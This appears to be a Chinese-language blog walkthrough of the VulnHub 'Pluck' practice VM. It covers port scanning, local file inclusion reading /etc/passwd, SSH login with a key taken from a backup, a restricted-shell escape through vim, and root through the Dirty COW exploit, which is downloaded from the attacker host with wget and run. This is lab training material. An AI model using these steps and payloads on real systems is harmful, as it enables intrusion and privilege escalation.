VulnHub - Pluck

环境说明：

Kali：172.21.137.232
靶机：172.21.137.224

渗透过程：

1、首先要找到靶机IP，arp-scan -l命令扫一下，发现靶机172.21.137.224（其实不用扫，这个靶机开启后就直接显示在上面了）

2、找到IP后，用Nmap扫一下端口，查看开的各类服务nmap -n -Pn -sV --open -p- -T4 172.21.137.224

3、简单信息搜集后，逐一访问端口，发现仅有80端口渗透价值较大

4、直接用dirsearch ./dirsearch.py --random-agents -u 'http://172.21.137.224/' -e *扫下目录，有admin.php可访问，未扫出更有价值的路径，直接手动在主页找吧

5、先进主页，上面有几个标签，点下CONTACT US，发现链接处可能会有熟悉的文件包含漏洞

6、直接修改page参数，经几次修改，发现可读本地文件../../../etc/passwd

7、从上图看到passwd文件最下方有个backup.sh的文件路径，用文件包含访问

8、根据所给的提示，直接用tftp下载/backups/backup.tar文件并解压出来，会有home和var目录


9、查看了var目录，仅仅是网页源码，而且是没有链接数据库的，纯静态网页，好家伙，忽悠我半天，整活技术独一枝。

10、再去看看home目录，有三个人名的目录，逐一查看，只有paul的key目录下有公私钥

11、很明显要用其中一个私钥登录，用命令ssh -i id_key4 [email protected]即可登录到一个限制的SHELL中

12、都试下来，猜测可能再哪一块可通过命令注入来逃逸当前的SHELL，进入Edit file，尝试用VIM逃逸方法，输入!/bin/bash和!/bin/sh逃逸，但失败了，有点难过


13、这里不行的话，试试在外面输入;/bin/bash

14、之后会进入VIM页面，看似没成功，其实退出VIM，就成功逃逸了

15、最终逃不过要提权，让我来康康小机子是啥版本的，uname -a给我冲！

16、本着一把梭结束任务的我，康康对应的POC，发现有脏牛！

17、那么先试试，不试怎么知道我不行呢？对吧

18、先下载POC到KALI，命令wget https://www.exploit-db.com/download/40616，记得重命名为40616.c，下一步要编译

19、看了下POC源码，编译命令为gcc cowroot.c -o cowroot -pthread，这里文件名改成我们的就行了

20、命令gcc 40616.c -o 40616 -pthread编译完成，会有一个40616文件

21、接下来确认下paul有wget可用，那就好说了

22、kali用命令python -m http.server 9091开端口，paul再/tmp/目录下用命令wget http://172.21.137.232:9091/40616下载


23、下载好后，并赋予执行权限chmod 755 40616

24、最后执行，运气好！直接成功！结束：）

PS：
1、最后几步要注意下，POC要用的是exploit db 的POC，而不是用工具检测出来的那个，附上地址。（该POC不知道什么原因，可以成功，但是连一会儿会断掉，靶机也会崩溃）
**
2、最后提权还有一个方法，通过找以ROOT权限运行的二进制文件来提权，最后用命令sh 39535.sh即可，这里就不写具体过程了，试过完全可行，而且稳定，参考链接里面有，顺便用该方法补上flag的截图。**

参考链接：

• https://g0blin.co.uk/pluck-vulnhub-writeup/
• https://securitybytes.io/vulnhub-com-pluck-vm-walkthrough-90a6eb70dab9
• https://www.rootnetsec.com/vulnhub-pluck/
• https://www.vulnhub.com/entry/pluck-1,178/